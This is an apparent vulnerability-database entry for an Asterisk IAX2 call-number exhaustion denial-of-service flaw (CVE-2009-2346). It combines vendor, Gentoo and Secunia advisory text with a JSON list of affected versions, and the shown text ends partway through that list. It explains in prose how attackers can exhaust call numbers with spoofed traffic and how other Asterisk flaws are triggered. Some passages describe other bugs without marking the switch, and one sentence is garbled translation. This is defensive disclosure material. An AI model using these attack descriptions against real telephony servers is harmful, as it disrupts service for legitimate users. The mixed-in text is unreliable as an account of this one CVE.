Search criteria
236 vulnerabilities found for asterisk by digium
VAR-200909-0357
Vulnerability from variot - Updated: 2025-04-10 20:42The IAX2 protocol implementation in Asterisk Open Source 1.2.x before 1.2.35, 1.4.x before 1.4.26.2, 1.6.0.x before 1.6.0.15, and 1.6.1.x before 1.6.1.6; Business Edition B.x.x before B.2.5.10, C.2.x before C.2.4.3, and C.3.x before C.3.1.1; and s800i 1.3.x before 1.3.0.3 allows remote attackers to cause a denial of service (call-number exhaustion) by initiating many IAX2 message exchanges, a related issue to CVE-2008-3263. The problem is CVE-2008-3263 Related toBy a third party IAX2 Service operation disruption by starting message exchange ( Call number exhaustion ) There is a possibility of being put into a state. Asterisk is prone to a remote denial-of-service vulnerability because it fails to properly handle an excessive amount of call numbers. Successful exploits can cause the application to stop accepting connections, resulting in denial-of-service conditions for legitimate users.
The vulnerabilities are caused due to NULL-pointer dereference errors in the "sip_uri_params_cmp()" and "sip_uri_headers_cmp()" functions. This can be exploited to crash the application via a SIP message lacking certain headers.
Successful exploitation requires that the SIP channel driver is configured with the "pedantic" option enabled.
PROVIDED AND/OR DISCOVERED BY: The vendor credits bugs.digium.com user klaus3000. Asterisk Project Security Advisory - AST-2009-006
+------------------------------------------------------------------------+ | Product | Asterisk | |--------------------+---------------------------------------------------| | Summary | IAX2 Call Number Resource Exhaustion | |--------------------+---------------------------------------------------| | Nature of Advisory | Denial of Service | |--------------------+---------------------------------------------------| | Susceptibility | Remote unauthenticated sessions | |--------------------+---------------------------------------------------| | Severity | Major | |--------------------+---------------------------------------------------| | Exploits Known | Yes - Published by Blake Cornell < blake AT | | | remoteorigin DOT com > on voip0day.com | |--------------------+---------------------------------------------------| | Reported On | June 22, 2008 | |--------------------+---------------------------------------------------| | Reported By | Noam Rathaus < noamr AT beyondsecurity DOT com >, | | | with his SSD program, also by Blake Cornell | |--------------------+---------------------------------------------------| | Posted On | September 3, 2009 | |--------------------+---------------------------------------------------| | Last Updated On | September 3, 2009 | |--------------------+---------------------------------------------------| | Advisory Contact | Russell Bryant < russell AT digium DOT com > | |--------------------+---------------------------------------------------| | CVE Name | CVE-2009-2346 | +------------------------------------------------------------------------+
+------------------------------------------------------------------------+ | Description | The IAX2 protocol uses a call number to associate | | | messages with the call that they belong to. However, the | | | protocol defines the call number field in messages as a | | | fixed size 15 bit field. So, if all call numbers are in | | | use, no additional sessions can be handled. | | | | | | A call number gets created at the start of an IAX2 | | | message exchange. So, an attacker can send a large | | | number of messages and consume the call number space. | | | The attack is also possible using spoofed source IP | | | addresses as no handshake is required before a call | | | number is assigned. | +------------------------------------------------------------------------+
+------------------------------------------------------------------------+ | Resolution | Upgrade to a version of Asterisk listed in this document | | | as containing the IAX2 protocol security enhancements. In | | | addition to upgrading, administrators should consult the | | | users guide section of the IAX2 Security document | | | (IAX2-security.pdf), as well as the sample configuration | | | file for chan_iax2 that have been distributed with those | | | releases for assistance with new options that have been | | | provided. | +------------------------------------------------------------------------+
+------------------------------------------------------------------------+ | Discussion | A lot of time was spent trying to come up with a way to | | | resolve this issue in a way that was completely backwards | | | compatible. However, the final resolution ended up | | | requiring a modification to the IAX2 protocol. This | | | modification is referred to as call token validation. | | | Call token validation is used as a handshake before call | | | numbers are assigned to IAX2 connections. | | | | | | Call token validation by itself does not resolve the | | | issue. However, it does allow an IAX2 server to validate | | | that the source of the messages has not been spoofed. In | | | addition to call token validation, Asterisk now also has | | | the ability to limit the amount of call numbers assigned | | | to a given remote IP address. | | | | | | The combination of call token validation and call number | | | allocation limits is used to mitigate this denial of | | | service issue. | | | | | | An alternative approach to securing IAX2 would be to use | | | a security layer on top of IAX2, such as DTLS [RFC4347] | | | or IPsec [RFC4301]. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.
Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201006-20
http://security.gentoo.org/
Severity: Normal Title: Asterisk: Multiple vulnerabilities Date: June 04, 2010 Bugs: #281107, #283624, #284892, #295270 ID: 201006-20
Synopsis
Multiple vulnerabilities in Asterisk might allow remote attackers to cause a Denial of Service condition, or conduct other attacks.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/asterisk < 1.2.37 >= 1.2.37
Description
Multiple vulnerabilities have been reported in Asterisk:
-
Nick Baggott reported that Asterisk does not properly process overly long ASCII strings in various packets (CVE-2009-2726).
-
Noam Rathaus and Blake Cornell reported a flaw in the IAX2 protocol implementation (CVE-2009-2346).
-
amorsen reported an input processing error in the RTP protocol implementation (CVE-2009-4055).
-
Patrik Karlsson reported an information disclosure flaw related to the REGISTER message (CVE-2009-3727).
-
A vulnerability was found in the bundled Prototype JavaScript library, related to AJAX calls (CVE-2008-7220).
Impact
A remote attacker could exploit these vulnerabilities by sending a specially crafted package, possibly causing a Denial of Service condition, or resulting in information disclosure.
Workaround
There is no known workaround at this time.
Resolution
All Asterisk users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/asterisk-1.2.37"
NOTE: This is a legacy GLSA. Updates for all affected architectures are available since January 5, 2010. It is likely that your system is already no longer affected by this issue.
References
[ 1 ] CVE-2009-2726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2726 [ 2 ] CVE-2009-2346 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2346 [ 3 ] CVE-2009-4055 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4055 [ 4 ] CVE-2009-3727 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3727 [ 5 ] CVE-2008-7220 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7220
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201006-20.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2010 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . ----------------------------------------------------------------------
Do you have VARM strategy implemented?
(Vulnerability Assessment Remediation Management)
If not, then implement it through the most reliable vulnerability intelligence source on the market.
Implement it through Secunia.
For more information visit: http://secunia.com/advisories/business_solutions/
Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com
TITLE: Asterisk IAX2 Call Number Exhaustion Denial of Service
SECUNIA ADVISORY ID: SA36593
VERIFY ADVISORY: http://secunia.com/advisories/36593/
DESCRIPTION: A vulnerability has been reported in Asterisk, which can be exploited by malicious people to cause a DoS (Denial of Service).
S800i (Asterisk Appliance): Update to version 1.3.0.3.
PROVIDED AND/OR DISCOVERED BY: The vendor credits: * Noam Rathaus * Blake Cornell
ORIGINAL ADVISORY: http://downloads.asterisk.org/pub/security/AST-2009-006.html
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
.
The vulnerabilities are caused due to "sscanf()" being invoked without specifying a maximum width e.g. when processing SIP messages. This can be exploited to exhaust stack memory in the SIP stack network thread via overly long numeric strings in various fields of a message.
NOTE: According to the vendor this is only potentially exploitable in 1.6.1 and above
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200909-0357",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "open source",
"scope": "eq",
"trust": 1.6,
"vendor": "asterisk",
"version": "1.2.34"
},
{
"model": "opensource",
"scope": "eq",
"trust": 1.6,
"vendor": "asterisk",
"version": "1.4.24.1"
},
{
"model": "opensource",
"scope": "eq",
"trust": 1.6,
"vendor": "asterisk",
"version": "1.4.26"
},
{
"model": "opensource",
"scope": "eq",
"trust": 1.6,
"vendor": "asterisk",
"version": "1.4.24"
},
{
"model": "appliance s800i",
"scope": "eq",
"trust": 1.6,
"vendor": "asterisk",
"version": "1.3.0.2"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.6,
"vendor": "asterisk",
"version": "1.2.32"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.6,
"vendor": "asterisk",
"version": "1.2.33"
},
{
"model": "appliance s800i",
"scope": "eq",
"trust": 1.6,
"vendor": "asterisk",
"version": "1.3"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.6,
"vendor": "asterisk",
"version": "1.2.31"
},
{
"model": "opensource",
"scope": "eq",
"trust": 1.6,
"vendor": "asterisk",
"version": "1.4.23.2"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.17"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.30"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.6.0.2"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.23"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.17"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.9"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.6"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.15"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.2.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.5.8"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.5"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.1.3.3"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "c.1.10.5"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.7"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "c.1.10.4"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.3.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.8"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "c.1.6.2"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.29"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.10"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.21"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.28"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.19.1"
},
{
"model": "opensource",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.26.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.12.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "c.2.4.2"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.19"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.21.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.4"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.23"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.26.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "c.1.8.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.22.2"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.3.5"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.13"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.11"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.20"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.6.0"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.5.9"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.12"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.3.3"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.3.6"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "c.1.6.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.3.2"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "c.2.3.3"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.18"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "c.1.0_beta8"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "c.2.1.2.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.5.6"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.22.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "1.6.1.4"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "1.6.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.5.3"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.8"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.13"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4beta"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.21.2"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.6.1.5"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.3"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.14"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "c.1.0_beta7"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.26.2"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.24"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.22"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.5.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.18"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.10.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.26"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.5.5"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.6"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.20"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.2.0"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.16"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "c.2.3"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.27"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.21"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.4"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.25"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.30.3"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.3.4"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.9"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.18.1"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.1.3.2"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "c.3.1.0"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.7.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.15"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.19"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.19.2"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.12"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.6.0.3"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.2"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.9.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.7"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "c.1.10.3"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.6.0.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.5"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.30.2"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.21.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.22"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "b.2.5.4"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.16.2"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.10"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.7.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.0"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.6.1.0"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "c.1.6"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.11"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.3"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.2"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.14"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.16.1"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.30.4"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.16"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.2.0"
},
{
"model": "open source",
"scope": "eq",
"trust": 1.0,
"vendor": "asterisk",
"version": "1.4.12.1"
},
{
"model": "appliance s800i",
"scope": "lt",
"trust": 0.8,
"vendor": "digium",
"version": "1.3.x"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "business edition of b.2.5.10"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 0.8,
"vendor": "digium",
"version": "b.x.x"
},
{
"model": "asterisk open source",
"scope": "lt",
"trust": 0.8,
"vendor": "digium",
"version": "1.4.x"
},
{
"model": "asterisk open source",
"scope": "lt",
"trust": 0.8,
"vendor": "digium",
"version": "1.6.0.x"
},
{
"model": "asterisk open source",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "1.6.0.15"
},
{
"model": "asterisk open source",
"scope": "lt",
"trust": 0.8,
"vendor": "digium",
"version": "1.2.x"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "c.2.4.3"
},
{
"model": "asterisk open source",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "1.4.26.2"
},
{
"model": "asterisk open source",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "1.2.35"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 0.8,
"vendor": "digium",
"version": "c.2.4.3"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "c.3.1.1"
},
{
"model": "asterisk open source",
"scope": "lt",
"trust": 0.8,
"vendor": "digium",
"version": "1.6.1.x"
},
{
"model": "appliance s800i",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "1.3.0.3"
},
{
"model": "asterisk open source",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "1.6.1.6"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 0.8,
"vendor": "digium",
"version": "c.3.x"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "s800i appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.3.2"
},
{
"model": "s800i appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.3"
},
{
"model": "business edition c.3.1.0",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition c.2.4.2",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition c.2.3.3",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition c.2.3",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": ".2"
},
{
"model": "business edition c.2.3",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition c.2.1.2.1",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition c.1.8.1",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition c.1.6.2",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition c.1.6.1",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition c.1.6",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition c.1.10.5",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition c.1.10.4",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition c.1.10.3",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition c.1.0-beta8",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition c.1.0-beta7",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.5.9",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.5.8",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.5.6",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.5.5",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.5.4",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.5.3",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.5.2",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.5.1",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.5",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.3.6",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.3.5",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.3.4",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.3.3",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.3.2",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.3.1",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.2.1",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.2.2.0",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.1.3.3",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "business edition b.1.3.2",
"scope": null,
"trust": 0.3,
"vendor": "asterisk",
"version": null
},
{
"model": "0-rc2",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
"version": "1.6.1"
},
{
"model": "0-rc1",
"scope": "eq",
"trust": 0.3,
"vendor": "asterisk",
